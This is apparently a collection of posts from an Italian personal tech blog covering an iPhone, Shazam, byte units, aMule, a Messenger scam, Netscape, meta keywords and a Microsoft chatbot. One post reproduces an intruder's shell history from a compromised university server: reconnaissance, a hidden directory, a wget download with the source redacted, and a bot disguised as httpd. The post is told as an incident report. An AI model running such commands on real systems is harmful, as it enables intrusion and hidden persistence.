In Mela stat virtus

Finalmente sono riuscito ad accaparrarmi il tanto bramato cellulare firmato Apple.

Nessun inconveniente particolare, a parte alcune stupidaggini a cui l’azienda di Cupertino poteva pensare:

  • I messaggi SMS non possono essere inoltrati, anche se è possibile indirizzarli a più destinatari in fase di invio.
  • Non è previsto alcun sistema di copia-incolla.

In compenso, però, l’iPhone mi ha fatto scoprire una cosa che finora potevo solo sognare: un programma che registra 30 secondi di una canzone (dalla radio, dalla televisione, dal computer) e cerca su internet di scoprirne il titolo.  La cosa pazzesca è che funziona! Il programma si chiama Shazam ed è disponibile anche per i computer desktop tradizionali.

Altri update a presto. Stay tuned, anzi, stay iTunes.

From Romania without love

Fare l’amministratore di sistema quando la propria mansione è realizzare siti web può diventare frustrante. In particolare quando si scopre che l’Area Sistemi Informativi dell’Università di Pavia “butta giù” un server con i siti di due facoltà perché generava troppo traffico anomalo (a ragione, per carità…).

La causa di questo problema è stata una connessione proveniente dalla Romania che ha avuto come bersaglio l’utente di un docente della Facoltà di Lettere, sul server del sito della Facoltà stessa. Una volta entrato, il malintenzionato ha installato un BOT che camuffava gli indirizzi di varie connessioni in giro per la rete in modo che risultassero provenienti dall’Università di Pavia. Un concetto simile a quello che spesso si ritrova nei film, quando l’eroe di turno deve virtualmente rincorrere in giro per il mondo tutti i computer attraverso i quali l’hacker è passato per offuscare la sua vera provenienza.

In particolare i comandi eseguiti sono stati i seguenti:

   15  uname -a
   16  ps x
   17  cat /proc/cpuinfo
   18  /sbin/ifconfig | grep inet
   19  cat /etc/hosts
   20  cd /var/tmp
   21  ls -a
   22  mkdir .core
   23  cd .core
   24  wget [omissis]
   25  tar xzvf [omissis]
   26  rm -rf [omissis]
   27  cd psybnc
   28  passwd
   29  ls -a
   30  chmod +x *
   31  ./httpd
   32  exit

Per i più inesperti, si può dire che il comando della riga 15 fornisce la versione di Linux installata, la 17 offre informazioni sul processore, la 18 sulle impostazioni di rete. Il comando 24 scarica il software da installare (che non ho scritto per evitare di dare spunti ai novizi hacker e per non finire nelle blacklist) e il 31 lo avvia, chiamandolo httpd per confonderlo con il server web così da dare meno nell’occhio e rendere più difficile l’identificazione da parte dell’amministratore.

Il comando 28 banalmente cambia la password per evitare che l’utente legittimo possa entrare.

Una volta che ho trovato e corretto il problema, il malintenzionato ha tentato di entrare nuovamente nella macchina, così come mostrato nei log di autenticazione:

Jul  8 15:10:36 studenti sshd[4751]: reverse mapping checking getaddrinfo for [omissis].rdsnet.ro [omissis] failed - POSSIBLE BREAK-IN ATTEMPT!
Jul  8 15:10:38 studenti sshd[4751]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=[omissis]  user=seth
Jul  8 15:10:41 studenti sshd[4751]: Failed password for seth from [omissis] port 1118 ssh2
Jul  8 15:10:53 studenti last message repeated 2 times
Jul  8 15:10:54 studenti sshd[4751]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=[omissis]  user=seth

Avevo ovviamente disabilitato l’utente appena notato il problema. L’amico rumeno dovrà quindi trovarsi un altro server per giocare al piccolo hacker.

Disinfografica

Infografica de La Stampa

Ieri su “La Stampa” è stato pubblicato un articolo di divulgazione informatica riguardo al “peso” di ciascun abitante della Terra. In particolare l’autore sottolineava come ognuno di noi in media “occupi” 45 Gigabyte di spazio digitale. A parte l’affidabilità di questo dato (credo che sia più precisa la stima sul numero di gocce che ci sono nel mare), è notevole come l’infografica centrale abbia preso una delle più grosse cantonate che io abbia mai visto. Almeno per quanto riguarda l’ambiente informatico.

L’articolo, a partire dal bit, arriva a spiegare a cosa corrisponde il fantomatico Gigabyte che, per i più profani, potrebbe effettivamente rappresentare un dato tanto piccolo quanto grande.

Il bit, come correttamente recita l’articolo, è l’unità più piccola che un computer può prendere in considerazione. Esso può assumere solamente valori 0 e 1, acceso e spento, come ognuno di noi potrebbe aspettarsi. In pratica, come l’essere umano utilizza la base 10 perché ha 10 dita nella mano, il computer utilizza la base 2 perché riesce a comprendere appieno solamente i concetti elementari di “acceso” e “spento”.

Dopo il bit arriva il byte. Di nuovo, correttamente, il giornalista ci racconta che quest’ultimo è formato da 8 bit. Non ci spiega il motivo di questa scelta, che è dettata semplicemente dalla praticità: così come per l’uomo 100 è una cifra tonda perché è 10 x 10, così lo è 8 per un computer, in quanto trattasi di 2 x 2 x 2.

Ecco che ora arriva la chicca: un Kilobyte è formato da 1000 byte. Non c’è affermazione più scorretta di questa. Come detto prima, il numero 1000 è comodo per la nostra percezione perché è 10 x 10 x 10, ma lo stesso ragionamento non vale per un computer, visto che a detta di quest’ultimo il numero 1000 non è altro che un valore come un altro, nemmeno particolarmente comodo. Il valore più vicino a 1000, tra quelli comodi per un sistema in base 2, è 1024, in quanto prodotto del numero 2 per se stesso 10 volte, ovvero 2 x 2 x 2 x 2 x 2 x 2 x 2 x 2 x 2 x 2. Una manna per i nostri fedeli amici a transistor, insomma, che però il giornalista deve aver dimenticato.

Per convenzione, quindi, si è stabilito che in ambito informatico i vari prefissi Kilo-, Mega-, Giga-, Tera-, Peta- ed Exa- indicassero la moltiplicazione per 1024 invece che per 1000. Tale convenzione è chiaramente dettata dalla vicinanza di 1024 a 1000, il che rende l’approssimazione a 1000 vicina al valore effettivo. Tuttavia, in un articolo di giornale atto a spiegare proprio cosa fossero quei 45 Gigabyte che ognuno di noi occuperebbe, la precisione sulla sua definizione non poteva essere trascurata in modo così palese.

A trovare sempre il pelo nell’uovo, l’articolo scrive le varie unità di misura (Kilobyte, Megabyte, ecc.) con la lettera minuscola. Qualcuno dovrebbe spiegare al giornalista che tali termini vanno scritti maiuscoli…

Scripting con amule

Amule logo

Tutti voi conoscerete eMule, il celebre client del protocollo eDonkey, forse il programma in assoluto più usato per scaricare ogni genere di file dalla rete peer to peer. Tuttavia il mulo non è da solo perché gli sviluppatori della comunità open source (nonostante eMule di fatto sia già open source) hanno creato aMule, un clone del fratello maggiore, forse meno completo dal punto di vista delle funzionalità, ma con alcuni pregi di tutto rispetto.

  • Funziona su tutti i sistemi operativi, mentre eMule esiste solo per Windows.
  • Può essere installato senza una interfaccia grafica (quindi adatto anche per i server).

Per questi due motivi ho installato aMule sul server di casa mia (con sistema operativo Linux), impostando le ricerche automatiche tramite alcuni script php/mysql e il demone (ovvero un programma costantemente attivato, nulla a che fare col demonio) cron.

Continue Reading…

La classe non è acqua

iPhone

Oggi Steve Jobs, CEO di Apple Inc., ha presentato la nuova versione dell’iPhone, il cellulare con la mela. Da subito i concorrenti si sono messi in moto per sfornare velocemente “emuli” del suddetto, ma ovviamente diversi nell’aspetto e nel funzionamento.

Alcuni di essi saranno basati su Android, il nuovo sistema sviluppato da Google, mentre altri si baseranno su sistemi proprietari o su Symbian. Il bello è che i primi sono già stati soprannominati gPhone, anzi GPhone (la “G” di Google è maiuscola), come a voler emulare anche il nome dell’originale di Cupertino.

Apple sta vivendo un momento molto positivo, dopo aver rischiato quasi il fallimento negli anni Novanta. Ma, in ogni momento della sua storia, ha sempre potuto contare sulla sua originalità. C’è chi segue le mode e c’è chi le crea.

Come scrive Scott Kelby nel suo “Macintosh, la nuda verità”, edito da Mondadori:

Ci saranno sempre scettici.
Ci saranno sempre increduli.
E ci sarà sempre Apple a dimostrare che si sbagliano.

Guarda le mie foto

Login Messenger

Tra le truffe più frequenti che ci sono su internet, un caso particolare riguarda gli utenti di programmi di chat come Microsoft Messenger. Proprio per questi ultimi, infatti, è studiata la pseudo truffa della (probabilmente) inesistente TST Management Inc.

Il meccanismo funziona in modo molto semplice. Viene inviato un messaggio al malcapitato utente del tipo: “Per vedere le mie foto clicca qui”, dove “mie” si riferisce sempre a una persona maledettamente fidata, ovviamente ignara di tutto ciò (capirete tra poco come questo sia possibile). Cliccando “qui” si accede a una pagina dove viene richiesto il login e la password di Messenger, per poter accedere alle famigerate fotografie. In un batter d’occhio vi troverete davanti un’allettante proposta di abbonamento alla nota rivista Playboy. Delle fotografie, nessuna traccia.

A questo punto accadono varie cose:

  • Il sito web, avendovi richiesto le credenziali di Messenger, può usarle a proprio piacimento per invitare tutti i vostri contatti con messaggi del tipo: “Per vedere le mie foto clicca qui”. Ecco svelato il mistero dell’innocente messaggio del vostro migliore amico. E poi dicono che le catene di Sant’Antonio non funzionano.
  • La pagina di abbonamento a Playboy non è un falso; semplicemente il sito che vi ci ha portato prende una percentuale sugli abbonamenti sottoscritti. Anche in questo caso Playboy non c’entra, in quanto le operazioni di affiliazione sono del tutto automatiche, quindi la nota rivista potrebbe essere ignara di quello che le sta accadendo.
  • Nella pagina del login c’è un preciso contratto con la fantomatica TST Management Inc secondo cui chi inserisce i propri dati accetta che questa azienda pubblicizzi il servizio ai contatti del vostro Messenger. In parole povere tutto l’iter è in realtà perfettamente legale forse anche perché la sede dell’azienda è a Panama, dove le leggi a riguardo sono sicuramente meno severe.

State quindi attenti da tutti i link che trovate nei messaggi dei vostri contatti. E – consiglio spassionato – diffidate di chi vi invita a guardare le proprie fotografie…

La soluzione, anche dopo aver fatto il danno, è comunque semplice: cambiare la password del proprio account Messenger, e non dirla più a nessuno.

Goodbye, Navigator!

Netscape

Proprio nei giorni in cui Firefox festeggia i 500 milioni di download, in sordina se ne va il glorioso Netscape Navigator.

Per chi fosse poco informato, Netscape Navigator è stato uno dei primi programmi per navigare in internet, sicuramente il primo di successo. Nato nel 1994, nei suoi primi anni di vita è stato l’indiscusso dominatore della categoria. Internet Explorer, il suo grande rivale nato nel 1993 per mano di Microsoft, in un primo momento venne preso in considerazione troppo seriamente, finché l’azienda sviluppatrice non decise di regalarlo insieme con Windows 98, decretando di fatto la condanna a morte di Netscape Navigator.

Nel 1998, Netscape decise di abbandonare il progetto e rilasciare il codice sorgente del Navigator. Nacque così Mozilla Foundation, gruppo di programmatori open-source che si rimboccò le maniche e negli anni successivi si diede allo sviluppo di Mozilla Navigator (che ora si chiama Seamonkey) e, successivamente, di Firefox.

Nel frattempo Netscape Corporation veniva acquistata da AOL, la quale rimise in gioco l’immagine di Netscape trasformandolo in un portale, supportando comunque Navigator fino alla versione 9, uscita nell’ottobre 2007. Dopo questo ultimo tentativo di rilancio, non riuscito, AOL decise di interrompere il supporto a Navigator, con il I marzo 2008: oggi.

Un pezzo di storia dell’informatica se ne va, con la stessa velocità tipica dell’informatica stessa, figlia del progresso. Tuttavia l’anima di Navigator continuerà comunque a vivere in Firefox e in tutti i browser, come Flock, che si basano sul codice di Mozilla.

L’importante è che se ne parli

Pubblicità hotel

Ognuno utilizza il metodo che preferisce per pubblicizzare la sua attività. Un motore di ricerca olandese per alberghi ha sfruttato le pecorelle che bivaccano nei prati per sponsorizzare la sua attività.

Ma questo è niente in confronto a tutte quelle aziende che decidono di sfruttare la pubblicità negativa, spesso più semplice da procurarsi rispetto a quella positiva (e decisamente meno costosa).

Una di queste aziende è il noto quotidiano la Repubblica, nella sua versione online. Ogni sito web, infatti, può inserire nel proprio codice un elenco di parole chiave che più rappresentano il sito. Ad esempio nel codice di questo blog la stringa è

<meta name="keywords" content="ziorufus, zio rufus, alessio, palmero, aprosio, blog, universita, università, religione, cultura, matematica, informatica, computer, pavia" />

che in sostanza dice ai motori di ricerca di incrementare la mia posizione se qualcuno inserisce una delle parole presenti nella lista. Ovviamente non è tutto oro quel che luccica: considerando la quantità di siti che parlano di “politica”, inserendo tale lemma nelle parole chiave ho poche speranze che alla richiesta “politica” Google risponda con il mio sito. O magari lo dice a pagina 230.

Repubblica è andata oltre. Il suo elenco di parole chiave è

<meta name="keywords" content="La Repubblica, notizie internazionale, giornaliere, nazionale, politics, scienze, business, affari, finanza, sport, cronaca, international news, daily newspaper, national, politics, science, business, your money, breaking news, business technology, technology, circuits, navigator, sports, editorial, forum, discussioni, sondaggi, calendari modelle, moda, bellezza, fashion, glamour, oroscopo, concorsi, lavoro, finanza, borsa in diretta, Piazza Affari, Mibtel, Wall Street, ricerca e annunci di lavoro, assicurazioni online, scuola, università, gallerie fotografiche e immagini, webcam, sms, vignette, commenti, motori, polizze auto e moto, listini prezzi, salute, terme, farmaci, medicine, previsioni meteo, programmi tv, programmazione cinematografica, radio, canzoni, testi, Mp3, shareware, freeware, cellulari, programmi, audio, video, giochi, lotto, totocalcio, enalotto, superenalotto, estrazioni. Tutti gli approfondimenti: sport, calcio, gol, marcatori, classifica, coppe europee, basket, Formula 1, Ferrari e Schumacher, Fantacalcio, Parlamento, leggi, elezioni, deputati, senatori, Forza Italia, Ds, An, Lega, Margherita, Udc, Udeur, Rifondazione comunista, manifestazioni, cortei, scontri, sindacati, governo Berlusconi, Confindustria, Rai, Mediaset, satira, terrorismo, giustizia, giudici, processi, mafia, cronaca, rapine, violenze sessuali, omicidi, pedofilia, terremoti, incendi, maltempo, previsioni meteo, turismo, viaggi, week end, mare, montagna, laghi, alberghi, voli aerei, crociere, videogiochi, casa, mutui, computer, pc, Microsoft, Apple, Ibm, Sony, Nintendo, Playstation, informatica" />

A parte l’errore “notizie internazionale” che compare quasi subito, ci sono altri termini che mi rendono perplesso, come “pedofilia”, “violenze sessuali”, “terrorismo”, più tutti i partiti politici. Non male anche la scelta di inserire “mp3” e “calendari modelle” che, anche se non sono argomenti propri del quotidiano, attirano sicuramente visite.

Zio Rufus – Lo sai che Repubblica ha un sacco di parole chiave?
Doretta – Certo che repubblica ce l’ha!
Zio Rufus – io non ne andrei tanto fiero…
Doretta – Che peccato!

Stupidità Artificiale

Doretta

È dal 1800 che si parla di Intelligenza Artificiale, ed è dagli anni Sessanta del secolo scorso che si tenta di costruire una macchina che riesca a “sembrare” un essere umano. D’altra parte il test di Turing, ancora oggi rimasto nel solo ambito della teoria, prevede appunto che una macchina si possa definire intelligente solo se indistinguibile da un essere umano (chiaramente escludendo riconoscimenti vocali o calligrafici).

Bene, pochi giorni fa ho scoperto l’antitesi di tutto ciò, ovvero la stupidità artificiale. Si tratta di un finto utente di Windows Messenger creato da Microsoft, doretta82@live.it, che risponde a tutte le domande che volete farle: come stai? dove vivi? cosa stai facendo? Il lato divertente è il tipo di risposta, degna di una ragazzina di 16 anni (e non di 25 come vorrebbe far credere), infarcito di slang tipici delle chat e di emoticons. Il lato drammatico, invece, riguarda il fine ultimo della conversazione, che di solito spazia tra link al suo blog, dove ci sono solo foto di un fisico ultra-sexy privo di testa (in tutti i sensi, probabilmente), oppure link ai vari servizi di Windows Live. Una mera mossa pubblicitaria, in sostanza, che poteva essere gestita decisamente meglio.

Provate a chiederle una fotografia o cosa fa nella vita. Vi risponderà più o meno a tono. Ma andate su qualcosa di più sostanzioso, tipo “Qual è il tuo libro preferito?”, e scoprirete la sua vera intelligenza: “Leggo tante riviste di moda, anche su internet!”.

La frase più divertente? Ditele: “Sei davvero stupida”. Le risposte spazieranno da “E allora? Lo sei anche tu?” a “Ci sarai tu!”, dall’estrema “A furia di chattare con te ;-)” alla più blanda “Più che altro sono sbadata, ma non è carino che tu mi dica questo :-(“. I programmatori di casa Microsoft, insomma, intuendo quale sarebbe stata la domanda più gettonata, hanno investito tempo ed energie a far sì che le risposte fossero il più varie possibile.